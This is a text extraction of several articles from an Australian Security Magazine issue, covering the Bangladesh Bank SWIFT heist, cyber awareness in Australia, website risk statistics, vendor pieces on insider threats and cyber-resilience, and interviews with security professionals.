About the Author Boaz Fischer is a recognized leader in promoting security best practices, awareness, and governance as well as a renowned authority in the Insider Threat Management space. Boaz has published two security books, numerous security articles, and has been nominated for multiple security awards. You can find more information about CommsNet Group here: www. commsnet.com.au To find out more about how ObserveIT helps organizations to prevent internal breaches, visit www.observeit.com
What Can You Do About Preventing Internal Data Breaches? If you want to implement practical steps towards preventing your next data breach, it’s vital to strategically cover your organization against Insider Threats by developing and implementing an Insider Threat Program. An Insider Threat Program will provide you with a robust, repeatable set of processes that you can use to identify and eliminate user-based risks. Need Help? Secondly, it is important to adopt an Insider Threat Management solution that enables you to understand and have clear visibility into who is doing what. Without this real-time visibility, you will continue to be in the dark when it comes to preventing confidentiality, integrity and availability breaches. ObserveIT offers an effective way for you to prevent data breaches whether they are caused by careless internal users, third-party vendors, or privileged IT users. Find out how you can implement: • Real-time security education (and blocking where necessary) • Deterrence against malicious users at the point of policy violation • Automated alerts and analytics to detect and predict risky behavior • Rapid investigation to reduce costs
Australian Security Magazine | 23
The Chinese New Year heist
A By Jane Lo Singapore Correspondent
traditional Chinese New Year celebration with volumes of ‘prosperity and good luck’ money gifts, asynchronous working days across 2 time zones, procedural and regulatory vulnerabilities, straight-through automated processing – these were among the elements that contributed to delays in detecting and responding to the Bangladesh Central Bank cyber break-in, and allowed sophisticated well-organized criminals to successfully launch their attacks on the payment system linking the Bangladesh Central Bank, The Federal Reserve Bank of New York and a network of commercial and correspondent banks, and almost carried off a haul of US$1billion - had not 2 words raised red flags and stopped 31 out of the 35 fraudulent transactions, but not before US$81million made their way into the casino industry in Philippines. What do we know so far? The attack combined the modern technique of hacking into computers with malware and old-fashion money laundering skills. Investigations by the authorities suggested that preparatory work may have begun as long as a year ago in May 2015 with the opening of bank accounts in the Philippines bank (Rizal Commercial Banking Corporation), after which the bank accounts were left dormant without any transactional activity till the attack in February 2016. The introduction of the malware into the Bangladesh Central Bank was likely to have taken place at least a month prior to the attack. Audit trails suggested the possibility of
24 | Australian Security Magazine
trial runs being conducted beforehand. According to the Bangladesh Police Criminal Investigation Department, the computer network at the Bangladesh Central Bank was not adequately secured – an unprotected firewall combined with weak password, and unused ports and remote access channel which were not adequately hardened - opened up entry points and allowed the criminals to penetrate the network perimeter. Procedural vulnerabilities where contingency plans in an event of breakdown of equipment (in this case the cross-border payment SWIFT software and the printer which would have listed payment instructions) and alternate communication channels failed to kick-in, and prevented the rapid detection and response to the breach. Additionally, timeliness of response was complicated not only by time zone differences but also asynchronous workweeks between Bangladesh and New York. Extra layer of protection from anomalous patterns detection - the materiality and frequency of the payment instructions from the Bangladesh Central Bank which appeared out of norm, a misspelled word, and a name under United States' sanctions list against Iran – raised red flags but by then $81million was already cleared and paid out. And, the heist perfectly timed during a holiday period when significant fund flows into the casino accounts were not unexpected and so failed to disrupt the attack at the end of the chain. Crucially, the CCTV cameras in the Philippines bank were disabled during this period, highlighting the organized nature of the attack. Timeline of key events during the attack - 35 fake transactions from the Bangladesh Central Bank was sent
"Two attacks have come to light since the Bangladesh Central Bank heist – $12 million stolen from Ecuador's Banco del Austro in 2015, and a foiled attempt at Vietnam's Tien Phong Bank in May 2016. " on 4th February 2016 Thursday over a span of a few hours. Detection and response stretched over the next few days, including the following Monday 8th February 2016, the first day of Chinese New Year in Philippines. Mitigating the Threats and Vulnerabilities Two attacks have come to light since the Bangladesh Central Bank heist – $12 million stolen from Ecuador's Banco del Austro in 2015, and a foiled attempt at Vietnam's Tien Phong Bank in May 2016. To address the vulnerabilities and update elements that contributed to the weakened defenses, including areas where there are legal and regulatory arbitrage opportunities making funds stolen from one country and transferred to another difficult to recover, SWIFT (Belgium-based co-operative owned by its user banks) and the Philippines government have introduced several initiatives. SWIFT announced that from December, a 'Daily Validation Reports' listing the messages sent from the client's SWIFT terminal to allow a bank to better spot fraudulent payment instructions, and also show anomalies in the transfer instructions – deviations from the client's typical payment patterns. As an added safety measure, these would be sent to clients’ payments and compliance teams through a separate channel from the SWIFT terminal, minimizing the exposure to a single point of failure. At the Black Hat USA Conference in 2016, Alain Desausoi, SWIFT’s CISO, emphasized the need for greater levels of intelligence sharing across the global financial community. Highlighting the work of the cooperative’s Customer Security Program, he underscored SWIFT’s commitment to exchange threat intelligence with its community: “Having accurate, up to date information on relevant cyber threats is critical. We are committed to driving greater levels of intelligence sharing across the global community through our Customer Security Program.” The Philippines Casino Anti-Money Laundering and Combating Financing of Terrorism Act Bill (House Bill 14), introduced by Quezon City Representative Feliciano Belmonte Jr, aims to tighten money laundering regulations and make it mandatory for casinos to report all financial transactions that are suspicious irrespective of the amount of the transaction. The proposed bill requires casinos that are regulated by the Philippine Amusement and Gaming Corporation (PAGCOR), the Cagayan Economic Zone Authority or any other regulatory body to mandatorily report all suspicious transactions to the Anti-Money Laundering Council (AMLC). In the explanatory note to the proposed bill, Belmonte said “The significance of including the casino sector under
the coverage of the Anti-Money Laundering Law was underscored by the Bangladesh Bank heist. Attempts to trace and recover the money encountered several setbacks, as casinos are excluded from the coverage of the country’s present anti-money laundering laws. This bill seeks to address this deficiency by putting the necessary amendments to discourage the use of the casinos as avenues of illicit activity. The provisions of this bill will help ensure the integrity of financial and banking institutions in the country, and is a crucial step in making the Philippines compliant with international standards.” “The work of the compliance department is more important now, and bank management appreciates that,” noted by the Association of Bank Compliance Officers president, and the Association of Certified Fraud ExaminersPhilippines Chapter, president, Dante Fuentes. The Philippines National CyberSecurity Plan 2022 The Department of Information and Communications Technology (DICT) launched on 8th December the initiative known as the National Cybersecurity Plan 2022, crafted by the Cybercrime and Cybercrime Investigation and Coordination Center (CICC), an attached agency of the DICT. The framework aims to ensure the continuous operation of critical “infrastructures”, public and military networks, businesses and supply chains and to launch a public awareness campaign. It intends to establish a National Computer Emergency Response Team (NCERT) to build the capability and capacity of the government for quick response and recovery during hacking incidents and other cyberattacks. “A capability building program of international standard must be set in place in accordance to the demands of digital forensics, network analytics and defense conceptualization, among others,” said Allan Cabanlong, DICT assistant secretary and CICC executive director. “Included in the cooperation are detection and mitigation approaches, frameworks for coordination of international originators of attacks, and co-design of stakeholder engagement strategies.” Under the cybersecurity governance framework, the DICT will be in charge of coordinating national protection, prevention and mitigation and recovery from cyber incidents, dissemination of domestic cyber threat and vulnerability analysis, security of government and civilian infrastructure and investigation of cybercrimes under its jurisdiction. The Department of Justice (DOJ), Philippine National Police (PNP) and the National Bureau of Investigation (NBI) will be the lead agencies for the investigation and prosecution of cybercrimes, as well as the enforcement of cybersecurity laws. The Department of National Defense (DND) will be in charge of defending the country from cyber-attacks, intelligence gathering of foreign cyber threats, securing
Australian Security Magazine | 25
Sources: Reuters, Bloomberg, Financial Times, PhilStar, New York Times, BAE Systems, Wall Street Journal
national security and military systems, and investigation of cybercrimes under military jurisdiction. The CICC, mandated to establish cybersecurity measures to guard against cyberthreats, is expected to enforce, evaluate, and monitor the cybersecurity policies through regular assessment and compliance activities, conduct of annual cyber drills and exercises and cybersecurity education and awareness program. “Rest assured that the DICT is in the frontline of cybersecurity protection for the Filipino people,” DICT secretary Rodoflo Salalima said at the press briefing. What to expect next? According to recent updates announced in December, the Head of the Forensic Training Institute of the Bangladesh Police's Criminal Investigation Department, Mohammad Shah Alam, mentioned that arrests are likely soon. With Chinese New Year fast approaching, the authorities will likely be extra vigilant and watch out for modus operandi of an impending attack by the same or another criminal syndicate. That last year, Chinese New Year fell on Monday 7th Feb and was a declared public holiday in Philippines would have formed part of the calculations when the criminals timed their attack. As the Chinese Year of Rooster is ushered in on 28th January this year – a Saturday with no extended long weekend to evade and delay detection - it would be a knee-jerk reaction in the extreme to suggest this denies the attackers the perfect window of opportunity to perpetuate the same crime. After all, it is not unrealistic to believe that the attackers
26 | Australian Security Magazine
have grown more resourceful, sophisticated and adaptive in the past year, and they very well have the skills, determination, boldness, ingenuity and the nerves to strike again. About the Author Jane Lo has more than 15 years of experience in enterprisewide risk management and writes on risk themes relevant in the financial services sector. She started her career in Canada after graduating from Electrical and Computer Engineering studies, and worked in the City of London for 10 years consulting for Corporates and Banks, before relocating back to Singapore 6 years ago. Outside of work, she is a marathon runner and enjoys spending time with friends and family.
Australia just can’t hack it By Ryan Linn Director of Advanced Threats and Countermeasures, Nuix
’ve been reflecting on a number of conversations I had and some of the concerns people expressed to me about cybersecurity during my recent two-week trip to Australia. One thing has particularly drawn my attention: cybersecurity is just now becoming a talking point in Australia. In the United States, we are inundated at least once a week with stories about this hack or that hack. As a result, organisations are at most just a few days away from another heavily publicised incident. This has led to individuals becoming more concerned with security and this awareness puts them in a better position to protect themselves online. For various reasons, I don’t think Australia is quite there yet. Cybersecurity should be a national issue Raising awareness is the first step to protecting Australian businesses and critical infrastructure. The Australian Government has delivered its Cyber Security Strategy and made efforts to increase awareness of security issues. The distributed denial of service attacks that disrupted the 2016 census helped make security very real and visible. So did the recent announcement that the Australian Red Cross Blood Service had accidentally published the details of 550,000 blood donors on its website. However, such announcements are relatively rare because the Australian Government has still not enacted mandatory
28 | Australian Security Magazine
breach disclosure legislation. As a result, many organisations that suffer breaches try to sweep the matter under the carpet rather than suffering the bad publicity – and other consequences – resulting from telling people what happened. Until Australians are aware of the true frequency and scope of data breaches and broader security threats, cybersecurity will not become a national concern and it will be hard to focus the minds of lawmakers and business executives on these issues. Visibility into your networks is critical Across the globe we suffer from a lack of security as well as a lack of insight into what’s happening on our networks, computers, and phones. Computing is becoming more powerful and user interfaces are facilitating easier computer use at the expense of visibility. Why is visibility so critical when we have antivirus, firewalls, and all of these other technologies protecting us? The answer is that attackers are staying one step ahead of the good guys and as a result it’s fairly easy to bypass many of these security controls. I’ve heard the phrase “We haven’t been breached … as far as we know” more times than makes me comfortable. What is most distressing about this statement is that many people don’t even have a grasp on what a breach is. If your organisation has had a virus, malware or any other malicious application appear on one of your systems, you’ve
been breached. These breaches are relatively easy to deal with by reinstalling the machine, using a cleaning tool, or hoping your antivirus software caught all the pieces. However all of these pieces of malware have a purpose besides just infecting machines. If you don’t know what that purpose was, it’s impossible to know what the impact of the breach has been. The emergence of ransomware has brought this issue to the forefront, yet most people don’t consider ransomware a breach. If someone else is holding your data hostage, how do you know they don’t have a copy? “Doxware” such as the Chimera ransomware doesn’t just hijack your data and encrypt it – it also releases your data online if you don’t pay promptly. The takeaway from this is that regardless of whether or not you think you’ve been breached, the truth is that you have, you just may not know what was taken. This is where insight comes into play. The more visibility you have into what’s happening on your device, the better your chances of detecting a breach and mitigating the damage before it becomes critical. As we push forward with technology, we now have to worry about internet connected doorbells and refrigerators, not just computers, phones and network hardware.
“We haven’t been breached … as far as we know” more times than makes me comfortable. What is most distressing about this statement is that many people don’t even have a grasp on what a breach is." As we move forward and start to demand security in everything from our bank accounts to our baby monitors, we drive the industries that we consume to do better. This isn’t a problem that was created overnight, so we shouldn’t expect it to be solved overnight either. Rather, by making sure we are diligent with our data and demanding others to do the same, we can keep pushing towards the levels of security that we need to protect ourselves from the world of chaos on the internet.
The vulnerabilities of the internet of things “Internet of things” devices such as thermostats, door locks, lighting and household appliances are becoming the latest attack surface. Attackers are looking at these devices and realising that not only do device owners have no visibility into what’s happening on their devices, many do not even know how the device is connected to the network and managed. The outcome is that attackers know more than the consumer which puts all of us at a disadvantage. To understand the extent of the problem, look at sites like Insecam that trawl the web looking for publicly available internet-connected cameras that use default credentials (admin:admin, for example) or sometimes no credentials at all. You can watch people from around the world from the comfort of your living room, and in some cases, watch them type in their usernames and passwords, credit card numbers and other sensitive data. So why are these devices so vulnerable? Because we as consumers aren’t telling companies that security is as important to us as functionality. Once we do, security will become more of a priority for these companies. We have to be willing to pay for products that do it right instead of shopping for what’s cheapest or just buying something because it works. We have to take responsibility for our security and hold companies accountable if we are to collectively reduce our risk of a cyberattack. What’s next? So what do we need to do to protect ourselves? Prioritising security in our everyday lives is a solid start. Take the example of two products or services that are identical except for price and security. By basing our purchasing decision on security, we’re signalling the vendors that we’d rather have a solid product, even if it costs a few more dollars.
Australian Security Magazine | 29
Editor’s insight interview: Big Data and analytics expert
avi Hubbly works in complex data environments. His expertise is in enabling an enterprise to transform data sets to generate greatly enhanced risk evaluation and decision making. Ravi and his team works with a range of business stakeholders and across industries including space missions and security. With 20+ years of information technology experience, Ravi leads the Leidos thought leadership group and advises customers on big data project implementations, as well as, influencing industry leading tool vendors, and internal research data analytics initiatives. In 2016, global science and technology solutions company Leidos announced the successful completion of the merger with Lockheed Martin’s Information Systems & Global Solutions (IS&GS) business. Globally this created a US$10 billion company dedicated to “complex systems integration and service provision with an innovative, smart technology-culture.” Amongst Ravi’s accomplishments, he has successfully delivered data environments for the Center for Medicare and Medicaid in analytics environment modernisation, NASA’s Human Research Program and Centers for Disease Control and Prevention’s HIV outbreak. One of the major customers of Leidos is a large US government agency where modern data analytics is applied for consumer protection and monitoring against bad business behaviour. Speaking with the Australian Security Magazine, Ravi explained, “typically what we have seen with these organisations in general is that most of them are interested in link analysis and how strong those connections are – based on those connections they can learn to predict behaviour and that kind of analysis is a very strong area of capability that law agencies are utilising. They are also constrained by the tools they currently have available.” “Our solutions make it feasible to apply a big data solution that handles all kinds of data, video, audio, structured data sets, semi structured sets and
30 | Australian Security Magazine
logs. Capturing huge sets of data from various data sources we can then process them to identify profiles and data sets.” “We can access an agency’s databases, criminal investigation reports, match them to social media and data from across other government agencies databases, and should we include additional data sets, such as geospatial information, we can create a diverse and highly valuable data set. These solutions are applicable to defence, law enforcement, government and civil agencies.” “Our solutions to customers includes using open solutions. With technology constantly changing and organisations getting caught in propriety systems, which often excludes other technology opportunities, our platform is an open platform with various interfaces and designed for a plug and play application. It’s like a Lego box and you choose pieces to plug in and it remains an open architecture, end to end solution. The analytics platform is called CAADS – Collaborative Advanced Analytics Data Sharing – which allows customers to integrate the platform into their data environment and framework and providing the support for a working solution in solving their business needs. Our business model is not around selling tools and technologies. It is around solving problems. It is referenced to the solution and based on the number of users and based on data sizes. We have applied CAADS broadly, from healthcare insurance companies and healthcare providers through to space agencies where it was applied for focusing on human safety in space. At its core, it can be applied to treasury, regulations, manufacturing and for money markets, or supporting research work, new drug developments and new healthcare models. CAADS is based on technologies similar to Google, where Google stores and accesses the data via links and we’re running an integrated set of tools on top of a Cloudera Hadoop cluster. Leidos partners with Cloudera and Intel, taking a differentiating approach that is providing no coding requirements, so does not need an ‘IT’ dependant approach to generating and accessing the data. That means the business does not need to know coding, it can simply ‘click, drag and drop’. This is designed to empower business users to be self-reliant. This makes it easy to use and apply for end users and they’re not relying on IT Teams to provide solutions. The Data Science can apply self-learning and artificial intelligence and the system self learns how users are using the data and what kind of operations are running. It will then become prescriptive and suggestive to approaches to data analytics. Leidos has launched its Australian business and employs over 900 Australians in Canberra and Melbourne. Christine Zeitz, Managing Director of Leidos Australia confirmed, “We are building on our existing customer base which includes the Department of Defence Centralised Processing program valued at nearly $1 billion and the Service Management and End User Computing contract with the Australian Taxation Office worth roughly $470 million. Whilst we have a strong heritage in the defence business, we are also committed to working in cyber security, big data, airport, and air traffic management systems.” Leidos also recently announced it has been awarded the Joint Project 2030 Joint Command Support Environment Phase 8 Sustainment contract to the value of AUD$55M. CAADS demo is available at https://www.leidos.com/healthcare/ advanced-analytics
“There is no such thing as a safe site”
By Chris Cubbage Executive Editor
he threat landscape and website risk has increased, where nearly half of the top 1 million websites are at risk, according to Menlo Security’s State of the Web 2016 report released this week. In addition, the report found that the attackers are young, savvy and are getting their hands on exploit tools that are readily available, easy to get, easy to deploy and are highly affective and lucrative in their impact. As if to support the report, between 5 and 9 December, Europol and law enforcement authorities from Australia, Belgium, France, Hungary, Lithuania, the Netherlands, Norway, Portugal, Romania, Spain, Sweden, the United Kingdom and the United States carried out a coordinated action targeting users of Distributed Denial of Service (DDoS) cyber-attack tools, leading to 34 arrests and 101 suspects interviewed and cautioned. Suspects in the EU and beyond were mainly young adults under the age of 20. The individuals arrested are alleged to have been paying for stressers and booter services to maliciously deploy software to launch DDoS attacks, which flood websites and web servers with massive amounts of data, leaving them inaccessible to users. The tools used are part of the criminal ‘DDoS for hire’ facilities for which hackers can pay and aim it at targets at their choosing. This is the state of the Internet as we move into 2017! The combination of wide spread software vulnerabilities, pervasive exploit kits, and throngs of new attackers has created the perfect storm. Traditional security products are failing with web based and email attacks unable to be stopped from simply applying “a good or bad approach” as we don’t understand what’s going to be bad tomorrow, according to Greg Maudsley, Senior Director of Product Marketing at Menlo Security. Phishing attacks can now use legitimate URLs and because of this vulnerability, attackers can compromise a legitimate site and create ‘drive-by attacks’ or a spoof link within a legitimate website – meaning there is no obvious anomalies in the URL that anti-phishing techniques can pick up. The report’s website review methodology involved developing a Chrome based browser farm to review websites ‘through the eyes of a normal human’, visiting the sites and fingerprinting the code of the site’s software and correlated that to CVEs (Common Vulnerability & Exploits) and the website’s reputation as a known bad or previously compromised site within the last 12 months – ticking any of these would class the site as ‘risky’. News and Media websites were considered the highest risk. Greg Maudsley pointed out the reason being, “they are all competing to get and keep user’s attention so they’re aiming for the newest and richest content and keeping it as ‘sticky’ as possible – to do that they are serving up more and more active content – therefore more background content – it is the background sites that
are beyond the control of the main sites. The most important finding was that last year 30% of the web is classed as ‘risky’ – but with each online request having up to 25 other additional requests going out in the background as a result – it is the factors associated with the background sites that have been included in this report to reach the conclusion that 46% of the top 1M sites are at risk. In other words, there is no such thing as a safe site. The statistics also showed a correlation between the type of code used, such as Microsoft-iis 7.5 which was the second most common vulnerable software seen in the Menlo Security report, and is currently running on over 50,000 of the top one million websites. For an individual to compromise a web server running this software, it is a simple matter of using exploit kits readily available on the Internet to enable a total system compromise. Today, within minutes, any motivated attacker can exert full control over a primary or background site, and deliver ransomware to unsuspecting visitors. Despite the term ‘risky’, the sites are not necessarily delivering malware but it is rather meant to describe the risk of these sites being exploited by attackers. And as the Europol arrests confirm, there is no shortage of attackers, they are spread across the globe and they have all the tools they need! 2016 Highlights: • News and media sites were riskiest overall with 50% of sites being classified as risky • Business and Economy sites this year came in as having the most recent threat history • Unintentional background requests, which send content to the user, outnumber intentional user requests at a ratio of 25:1 • Nginx version 1.8.0 and Microsoft-iis version 7.5 were the most commonly used vulnerable software versions.
Australian Security Magazine | 31
Women in Security
From law to cyber security With Rachael Falk Director of Technology, Security & Strategy at .au Domain Administration Ltd Rachael practiced as a lawyer in Australian and overseas law firms before commencing with Telstra. Moving from legal to cyber security, Rachael had several roles in Telstra Security Operations, including National Security Advisor. Now in a new executive position, Rachael has a clear remit to shape auDA's role in the cyber security ecosystem both with Australia and internationally. ASM: How did you get into the security Industry? I have always liked solving problems and challenges and when I was at Telstra, I became more involved in data breach issues and it became clear to me that cyber security was regarded everywhere as more of an IT problem. I saw an opportunity to change this and help the business understand that cyber security was a risk that everyone from the board down should understand and manage. So, I was offered a one year secondment from Telstra Legal to Telstra Security Operations and it was a great move. Telstra hired a new CISO in 2013 who had a very strategic approach to cyber security and approached it as a business risk. Since then, I have never looked back. ASM: How did your current position come about? The .au Domain Authority (known as auDA) is both the regulator of and manages the .au domain zone and it has gone through a period of transition over the last 12 months. They wanted an innovative approach to security and to play their role in Australia’s cyber security eco system. I had left Telstra and was enjoying a long break but the opportunity to help shape a different cyber security narrative was too hard to refuse. ASM: What are some of the key challenges you think the industry is faced with and what difference do woman in leadership roles make to meeting these challenges? The key challenge is for leaders to understand that cyber security is a risk that can be effectively managed but the tone is set from the top. Leaders who demonstrate that they care about customer data, they invest in effective security outcomes and that they have thought about how they can recover from an incident is critical. I still think there is far too much reliance on a magical technology solution or for compliance frameworks to solve this issue. Compliance does not equal security and putting a whole bunch of tech toys in your SOC (Security Operations Centre) does not equal effective security. It has to be a combination of leadership, culture, good tech and awareness. I think women, no matter which industry they are in, bring diversity of thought. I see my key strength as not necessarily being female but being a former lawyer, who can think critically and can write in accessible English. So, I think we bring our backgrounds and a different perspective.
32 | Australian Security Magazine
ASM: Where do you see the industry heading and are women sufficiently or increasingly being recognised and respected? I see it heading towards hopefully a greater understanding that cyber security is a business risk. I think recent events have shown us that Australians are becoming more cyber aware and that they in turn should demand that anyone wanting to use and store their valuable data need to be accountable should it be lost or stolen. All of us (me included!) want to know that our valuable data is being protected at all times. And I want to know that the boards and Leadership Teams of all organisations that handle valuable data care about that data and build security into all that they do. I still see far too many conference flyers with all men in the photos and the fact that this seems to not be noticed by those conference organisers astounds me. But thankfully there are great men in the industry who share these views and go out of their way to promote women into leadership roles, recognize their talent and not attend those conferences. I think women to need to be confident and put themselves forward for events. ASM: Are you an active mentor or being mentored and how important has a mentoring framework been to you? I am a strong believer in mentoring both for me and for what I can give to others. There is nothing better than being able to bounce an issue or problem around with someone else. It is great therapy but also broadens your perspective. There are a range of very talented women I talk to within the industry. Some are still students right through to working in cyber security. I see my role as bringing others through with me and where I can connect them with other people in the industry or help create opportunities for them. I also like sharing information or ideas with them. As for me being mentored, I have a panel of advisors (not sure they all know they are on my panel!) because I do often ask for advice on a particular issue or situation but I am a strong believer in being open to different perspectives. I am very fortunate to have a wide range of people I can call on should I have an issue or question. ASM: Do you have a particular agenda or focus that you would like to highlight? I see great opportunity and challenges in cyber security. It is a great area to work in although when I was admitted to practice law 20 years ago, this role didn't even exist. The importance of cyber security is a leadership issue that needs to be addressed at a board level but also filter down an organisation. I also don't mean that boards should be bombarded with what I call ‘packs & stats’ which traditionally involve lots of ‘attack’ and ‘threats’ numbers in large packs. Do that with a board or leadership team and you are in eye glazing over territory. Engage all leaders with stories about the impact of losing valuable data both at a customer level and at a reputational level. You need to engage the hearts and minds so that the organisation understands that cyber security is a business essential and not an optional extra. My second point would be that diversity within the industry is key and we need to involve key men in the industry because those with strong voices pave the way for others as well. ASM: What do you do when you're not working? I work full time so far too much cleaning!! I enjoy cooking, reading, being with my kids (when I can get them off devices) and planning our next holiday (where no one seems to agree on any destination). I am afraid I'm not a good example of work life balance but having a good long break last year really made me appreciate the little things.
I N V I T A T I O N
EXCLUSIVE INTERPOL WORLD 2017 AUSTRALASIA POLICE & SECURITY PROFESSIONALS SINGAPORE DELEGATION INNOVATION TOUR
4-7 July 2017 | Suntec Singapore Convention and Exhibition Centre MySecurity Media is pleased to be the official and exclusive marketing agency for the region of Australia & New Zealand for INTERPOL World 2017. INTERPOL World 2017 provides a premium platform for public and private security sectors to discuss and showcase solutions to fast evolving global security challenges. The biennial exhibition and congress brings together law enforcement, government bodies, academia, international security professionals and decision making buyers to security solution providers and manufacturers. For more about the program visit - www.interpol-world.com
MySecurity Media will manage all logistics, such as flight/hotel bookings for the visiting delegation. 2015: 7,807 Visitors & Delegates 2017: 300 Exhibitors
Some of the main topics:
PREMIUM SPONSORSHIP OF INTERPOL WORLD 2017 DELEGATION AVAILABLE:
Email: email@example.com Delegate Profiles: Chiefs, Heads, Directors, Officers, Security Professionals, Security Consultants, System Integrators. Visitor profiles: www.interpol-world.com/visiting
• • • • • • •
IoT, cybersecurity, big data analytics Biometrics Genetic & synthetics biology Safe cities Robotics Unmanned/artificial intelligence Face recognition
“We came to meet senior police leaders from other countries with a view to exchange criminal records, biometrics and fingerprints. We achieved ten new partners.” -Ian Readhead, National Police Chiefs’ Council, UK
Express interest in joining us at this exclusive event or visit www.interpol-world.com/visiting-delegation
Australian Security Magazine | 33
Practical steps for building a cyber-resilient enterprise
K By Ben Field County Manager, Fortinet Australia
34 | Australian Security Magazine
eeping your networks up and running is essential to your organisation. Without network access you can’t send or receive emails, manage your financials, take on-line orders, work in the cloud or take care of any of the mission-critical applications that drive your business forward. You might need a comprehensive network security solution. But what you really want is business continuity. Cyber security is not an end unto itself. The raison d’etre for your security ecosystem is to ensure business continuity. As such, cyber security should be viewed as a holistic system that encompasses everything from hardware and software through management oversight, network transparency, security policy reviews, staff training and constant feedback. There is no ‘silver bullet’ to protect your network. It takes an arsenal. The more weapons you have at your disposal, the more resilient your network – and organisation – will be. Keeping today’s risks in check is referred to as ‘cyberresiliency’. Cyber-resiliency is defined as ‘a systematic approach for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an organisation's information security to achieve business objectives’ (ISO/IEC 27000:2014). Cyber-resilience is a function of visibility. The tighter the control you have over your network – at the gateway as well as behind the firewall - the better armed your organisation
will be to act fast if (and when) a security event does occur. And the best way to maintain that visibility – and protection - is to consolidate your security and network management operations under a common framework. Cyber-resilience optimises operational management Cyber-resilience and optimised operations go hand-in-hand. You can’t separate them. They are both equally essential to maintaining business continuity. You should be able to see, via a dashboard, exactly what is happening on your network. As you monitor traffic patterns and user behaviour you can see immediately if there are any anomalies that might indicate a security event. At the same time you can ensure that you have allocated enough resource – processing power, bandwidth, etc – to fully support your users as they go about their business. And because you are building a complete profile of network activity, you can create comprehensive reports for cost accounting, governance and compliance. This convergence of operations and security gives you more control than ever over your network and provides an unprecedented opportunity to ensure that your network operates at maximum efficiency with minimised risk.
KEY WORDS USED TO DESCRIBE CYBER RESILIENCE
The steps towards cyber-resiliency The first step towards ensuring cyber-resiliency is to be prepared. A well-thought out, comprehensive security policy is essential to keep your business processes turning over. Specifying a security policy is not a technical issue but a managerial imperative. Start with the desired outcome – business continuity – and then work down. If you don’t have a plan, you can’t set the rules nor specify procedures. And that leads to confusion, cost over-runs, poor performance, gaps in your network security profile and, ultimately, lapses in your business continuity. The next phase of cyber resiliency – again part of your security policy- is to develop responses after a threat has been discovered. Staff, especially IT staff, should be trained on what to do if they discover an attack in progress. They need to isolate the event, repair any damage and then evaluate how the event occurred and what needs to be done to prevent a similar threat. This is part and parcel of an advanced threat protection (ATP) strategy. An incident reporting strategy is important. A crisis communications strategy needs to be in place, especially for high-profile organisations. The strategy may include which partners to notify and a media response. And if the Data Breach Notification bill passes, you’ll have a statutory requirement to report not just the event but what steps you took to isolate, mitigate and repair the damage. Those that don’t face a range of penalties, including fines of $360,000 for individuals and $1.8 million for organisations. Recovery is the next stage of cyber resiliency. Damage and threat assessments need to be completed before the system restoration. You’ll need to ensure that no undetected payloads are lurking around your network, just waiting to pop up when least expected. Finally, review, improve and adapt. Data forensics – your syslogs are worth their weight in gold - can show what went wrong. A SIEM (security information and event management) solution can be handy. And, of course, any sort of predictive strategy is ideal. Subscribing to the most up-to-date threat intelligence can give you a heads-up for most threats except zero-day and highly-professional directed attacks. This is where public-private partnerships (PPP) can shine. Instead of individual companies working on problem
And if the Data Breach Notification bill passes, you’ll have a statutory requirement to report not just the event but what steps you took to isolate, mitigate and repair the damage. Those that don’t face a range of penalties, including fines of $360,000 for individuals and $1.8 million for organisations.
resolution alone, vendors, enterprises and governments – such as AusCERT- can work together. These combined resources can go a long way to prevent all but the most persistent cyber threats. Fortinet’s approach to cyber-resiliency Fortinet’s Security Fabric provides a framework for building cyber-resiliency into an organisation. Fortinet’s pervasive network security gives network operators transparency at the granular level. Fortinet’s single-pane-of-glass management dashboard console provides realtime metrics that automatically identify any anomalies inside the network or at the gateway. And once you have ascertained the scope and root cause of the event, you can take the appropriate action. As a security professional, it’s your job to keep your organisation’s network up and running. But you’ll need the right tools to ensure cyber-resiliency and maintain business continuity. Fortinet’s Security Fabric is the only pervasive security solution set that can protect your entire network at the granular level. Business continuity is the goal. And Fortinet has the means to deliver. About the author Ben Field, Fortinet’s Australian Country Manager, has more than 15 years of professional managerial and technical experience in delivering cyber-resilient solutions via the channel and direct. With a specialty in data centres and enterprises, Ben is focussed on providing solutions that keep systems up and running.
Australian Security Magazine | 35
Is privacy a lost cause? "Your entire life is online. And it might be used against you. Be vigilant." - Febelfin
T By Guillaume Noé General Manager for Pirean, Australia & New-Zealand
36 | Australian Security Magazine
hree years following the explosive mass cyber surveillance revelations from Edward Snowden and the global privacy debate that they ignited, the release of the Snowden movie gives us an opportunity to reflect on the current state of our cyber privacy: • How much do we care about our cyber privacy? • What are we doing about it? • How achievable is it to attain enough cyber privacy?
scale of vulnerabilities and cyber threats. I think there is a general lack of information security and privacy awareness education amongst many cyber users. As such, the likelihood and impact of privacy breaches is significantly increased and, even more so, as we further extend the cyber world to many connected devices in our lives (the Internet of Things), we are further prone to the information they collect, process and hence, place at risk.
The Importance of Cyber Privacy
Cyber privacy risks are inherent to the following key trends:
Cyber privacy refers to our right to understand and control what happens with our personal information online. It relies on our appreciation of what personal data of ours is stored, processed, transmitted and accessed online and whether it is managed according to associated privacy regulations, such as the Australian Privacy Act. This also includes compliance with the privacy policies of online service providers, such as online banking services, Facebook, Skype, LinkedIn and Twitter, as well as the personal confidentiality expectations we might have of the services we use – such as sharing a family picture with a select group of people or establishing a VoIP call or video conference with one or more co-workers. Cyber privacy is no different to physical privacy and should be no less important. When we send a private letter by mail, we expect it will remain sealed and private until delivered to our intended recipient – we should have this same expectation online. However, privacy risks are significantly increased online because of the scale of access to digital information, the speed of access to information, the
1. Over-publishing personal information online, or publishing without enough control Personal information published online, such as personal details, photos, locations and activity updates can be used maliciously and expose people to key risks including identity theft and cyber-stalking for example; the more data we publish, especially with limited control, the greater the privacy risk. The risk to our privacy is perfectly shown in this amazing video featuring Dave, an alleged Belgian "psychic," revealing intimate details about random volunteers in search of clairvoyant enlightenment: https://youtu.be/F7pYHN9iC9I. Dave sources real time intelligence from online sources, such as Facebook, on each of his subjects during his consultations. The video was part of a campaign from a Belgian financial organisation, and perfectly demonstrates how easy it is to acquire a person’s personal information online. It concluded with "Your entire life is online. And it might be used against you. Be vigilant."
